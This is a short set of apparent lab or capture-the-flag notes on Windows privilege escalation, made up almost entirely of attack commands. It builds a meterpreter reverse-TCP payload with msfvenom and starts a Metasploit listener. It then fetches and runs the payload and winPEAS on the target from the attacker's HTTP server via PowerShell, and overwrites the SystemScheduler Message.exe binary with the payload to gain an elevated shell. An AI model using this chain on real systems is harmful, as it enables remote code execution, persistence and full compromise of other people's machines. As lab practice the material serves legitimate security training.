Windows Privilege Escalation
Generate payload with better shell
hacker machine
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe
Expose shell.exe by local server
hacker machine
python3 -m http.server
Run listener
msfconsole
msf6 > search multi handler
> 5 exploit/multi/handler
...
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Get shell.exe
target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
target machine
cd C:\Windows\Temp
dir
.\shell.exe
target machine
shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat
target machine
meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run
now we should get root shell